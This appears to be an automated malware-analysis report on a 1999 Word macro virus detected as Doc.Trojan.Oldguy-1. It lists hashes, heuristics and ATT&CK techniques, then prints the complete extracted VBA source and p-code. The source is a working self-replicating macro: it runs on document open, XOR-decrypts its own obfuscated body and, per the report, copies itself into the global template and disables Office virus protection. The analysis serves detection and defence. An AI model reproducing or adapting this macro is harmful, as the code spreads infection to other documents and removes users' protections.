Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ad18e8a297a62a6…

MALICIOUS

Office (OLE)

Size: 44.0 KB
Created: 1999-12-23 18:22:00
Authoring application: Microsoft Word 8.0
First seen: 2015-10-03
MD5: d98929b038165fcddc39373d18914380
SHA-1: f8c0c1cd7cff11345f09803b9d6e9c3b48a64202
SHA-256: 1ad18e8a297a62a671b2415f25cb5869d712aab4c3578dd20b2bc03105c6750e
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The critical heuristics indicate that the macros are designed for self-replication and AV tampering, suggesting a trojanized document. The Document_Open macro is present, which is a common execution vector for malicious VBA.

Heuristics (4)

  • ClamAV: Doc.Trojan.Oldguy-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Oldguy-1
  • VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    For Éo¥»ßû = 11 To 28: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine Éo¥»ßû, ªÎÞþÐí(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(Éo¥»ßû, 1), 2), ¤éÄù¼ò): Next: £îñ3zêrð
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
    Private Sub Document_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8140 bytes
SHA-256: b3e3800baf91076bb0a574be574951e0f5cf91ce12b9da9d6703540e53581ebd
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù
Private Sub Document_Open()
On Error Resume Next
¤éÄù¼ò = 153
For Éo¥»ßû = 11 To 28: ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine Éo¥»ßû, ªÎÞþÐí(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(Éo¥»ßû, 1), 2), ¤éÄù¼ò): Next: £îñ3zêrð
End Sub
Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò)
For Éo¥»ßû = 1 To Len(¢UøòçÞ): ªÎÞþÐí = ªÎÞþÐí & Chr(Asc(Mid(¢UøòçÞ, Éo¥»ßû, 1)) Xor ¤éÄù¼ò): Next
End Function
Private Sub £îñ3zêrð()
'=p]`%k¹¤¹¨­©¹²¹Ð÷í±Ë÷ý¹³¹«ª°
'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹­µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k
'ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡
'ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k°
'×üáí
'Öéíðö÷ê·ÏðëìêÉëöíüúíðö÷¹¤¹ßøõêü£¹Öéíðö÷ê·Êøïü×öëôøõÉëöôéí¹¤¹ßøõêü
'Øééõðúøíðö÷·Ü÷øûõüÚø÷úüõÒü๤¹îýÚø÷úüõÝðêøûõüý
'Øééõðúøíðö÷·ÝðêéõøàÊíøíìêÛøë¹¤¹ßøõêü
'ÍñðêÝöúìôü÷í·Êøïü
'Ðÿ¹ÔøúëöÚö÷íøð÷ü빤¹×öëôøõÍüôéõøíü¹Íñü÷¹Êüí¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Üõêü¹Êüí¹j5D~êerC¹¤¹×öëôøõÍüôéõøíü
'Êüí¹j5D~êe¹¤¹j5D~êerC·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü
'Ðÿ¹j5D~êe·Õð÷ü걨µ¹¨°¹¥§¹»¾^
'j5D~êe·ýüõüíüõð÷ü깨µ¹j5D~êe·úöì÷íöÿõð÷üê
'j5D~êe·ð÷êüëíõð÷ü깨µ¹ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷ü걨µ¹ª«°
'Ðÿ¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Íñü÷¹ØúíðïüÝöúìôü÷í·Êøïü
'Ü÷ý¹Ðÿ
'Îðíñ¹Ýðøõöþê±îýÝðøõöþßðõüÊìôôøëàÐ÷ÿö°£¹·Íðíõü¹¤¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë껣¹·Øìíñö빤¹»üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü»£¹·Úöôôü÷í깤¹»ýö¹àöì¹ò÷öî¹îñö¹ð¹øô¦»£¹·Üáüúìíü£¹Ü÷ý¹Îðíñ
'Ðÿ¹Ýøà±×öî°¹¤¹«ª¹Íñü÷¹Êüõüúíðö÷·ÍàéüÍüáí¹±»úõøêê·êøôéõü¹ûà¹üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü·»¹¿¹ïûÚ빿¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë긻°
End Sub
'Class.sample by emanuel g0ldstein
'Old guy with new name ;) Don't get me wrong!
'Do not spread this shit!

' Processing file: /opt/analyzer/scan_staging/905a324ce67a4f8dadb298139f2a8de7.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 12006 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0018 "Ç™ýñãßdù£îñ3zêrðÇ™ýñãßdù"
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0099 
' 	St ¤éÄù¼ò 
' Line #4:
' 	StartForVariable 
' 	Ld Éo¥»ßû 
' 	EndForVariable 
' 	LitDI2 0x000B 
' 	LitDI2 0x001C 
' 	For 
' 	BoS 0x0000 
' 	Ld Éo¥»ßû 
' 	Ld Éo¥»ßû 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	Ld ¤éÄù¼ò 
' 	ArgsLd ªÎÞþÐí 0x0002 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	ArgsCall £îñ3zêrð 0x0000 
' Line #5:
' 	EndSub 
' Line #6:
' 	FuncDefn (Private Function ªÎÞþÐí(¢UøòçÞ, ¤éÄù¼ò, id_FFFE As Variant))
' Line #7:
' 	StartForVariable 
' 	Ld Éo¥»ßû 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ¢UøòçÞ 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld ªÎÞþÐí 
' 	Ld ¢UøòçÞ 
' 	Ld Éo¥»ßû 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld ¤éÄù¼ò 
' 	Xor 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St ªÎÞþÐí 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' Line #8:
' 	EndFunc 
' Line #9:
' 	FuncDefn (Private Sub £îñ3zêrð())
' Line #10:
' 	QuoteRem 0x0000 0x001C "=p]`%k¹¤¹¨­©¹²¹Ð÷í±Ë÷ý¹³¹«ª°"
' Line #11:
' 	QuoteRem 0x0000 0x0055 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹­µ¹»=p]`%k¹¤¹»¹¿¹=p]`%k"
' Line #12:
' 	QuoteRem 0x0000 0x0015 "ßöë¹Pö<"Fb¹¤¹¨¨¹Íö¹«¡"
' Line #13:
' 	QuoteRem 0x0000 0x00A2 "ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·ËüéõøúüÕð÷ü¹Pö<"Fbµ¹Úñ뱪 °¹¿¹3WGgIt±ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷üê±Pö<"Fbµ¹¨°µ¹=p]`%k°"
' Line #14:
' 	QuoteRem 0x0000 0x0004 "×üáí"
' Line #15:
' 	QuoteRem 0x0000 0x0041 "Öéíðö÷ê·ÏðëìêÉëöíüúíðö÷¹¤¹ßøõêü£¹Öéíðö÷ê·Êøïü×öëôøõÉëöôéí¹¤¹ßøõêü"
' Line #16:
' 	QuoteRem 0x0000 0x002E "Øééõðúøíðö÷·Ü÷øûõüÚø÷úüõÒü๤¹îýÚø÷úüõÝðêøûõüý"
' Line #17:
' 	QuoteRem 0x0000 0x0024 "Øééõðúøíðö÷·ÝðêéõøàÊíøíìêÛøë¹¤¹ßøõêü"
' Line #18:
' 	QuoteRem 0x0000 0x0011 "ÍñðêÝöúìôü÷í·Êøïü"
' Line #19:
' 	QuoteRem 0x0000 0x0068 "Ðÿ¹ÔøúëöÚö÷íøð÷ü빤¹×öëôøõÍüôéõøíü¹Íñü÷¹Êüí¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Üõêü¹Êüí¹j5D~êerC¹¤¹×öëôøõÍüôéõøíü"
' Line #20:
' 	QuoteRem 0x0000 0x003A "Êüí¹j5D~êe¹¤¹j5D~êerC·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü"
' Line #21:
' 	QuoteRem 0x0000 0x001C "Ðÿ¹j5D~êe·Õð÷ü걨µ¹¨°¹¥§¹»¾^"
' Line #22:
' 	QuoteRem 0x0000 0x0029 "j5D~êe·ýüõüíüõð÷ü깨µ¹j5D~êe·úöì÷íöÿõð÷üê"
' Line #23:
' 	QuoteRem 0x0000 0x0054 "j5D~êe·ð÷êüëíõð÷ü깨µ¹ÍñðêÝöúìôü÷í·ÏÛÉëöóüúí·ÏÛÚöôéö÷ü÷í걨°·ÚöýüÔöýìõü·Õð÷ü걨µ¹ª«°"
' Line #24:
' 	QuoteRem 0x0000 0x0035 "Ðÿ¹j5D~êerC¹¤¹ØúíðïüÝöúìôü÷í¹Íñü÷¹ØúíðïüÝöúìôü÷í·Êøïü"
' Line #25:
' 	QuoteRem 0x0000 0x0006 "Ü÷ý¹Ðÿ"
' Line #26:
' 	QuoteRem 0x0000 0x00B6 "Îðíñ¹Ýðøõöþê±îýÝðøõöþßðõüÊìôôøëàÐ÷ÿö°£¹·Íðíõü¹¤¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë껣¹·Øìíñö빤¹»üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü»£¹·Úöôôü÷í깤¹»ýö¹àöì¹ò÷öî¹îñö¹ð¹øô¦»£¹·Üáüúìíü£¹Ü÷ý¹Îðíñ"
' Line #27:
' 	QuoteRem 0x0000 0x0088 "Ðÿ¹Ýøà±×öî°¹¤¹«ª¹Íñü÷¹Êüõüúíðö÷·ÍàéüÍüáí¹±»úõøêê·êøôéõü¹ûà¹üôø÷ìüõ¹þ©õýêíüð÷µ¹öõý¹þìà¹îðíñ¹÷üî¹÷øôü·»¹¿¹ïûÚ빿¹»ÑÚÝʹøëü¹õ­ôª¹õªîã©ë긻°"
' Line #28:
' 	EndSub 
' Line #29:
' 	QuoteRem 0x0000 0x0021 "Class.sample by emanuel g0ldstein"
' Line #30:
' 	QuoteRem 0x0000 0x002C "Old guy with new name ;) Don't get me wrong!"
' Line #31:
' 	QuoteRem 0x0000 0x0018 "Do not spread this shit!"
' Line #32: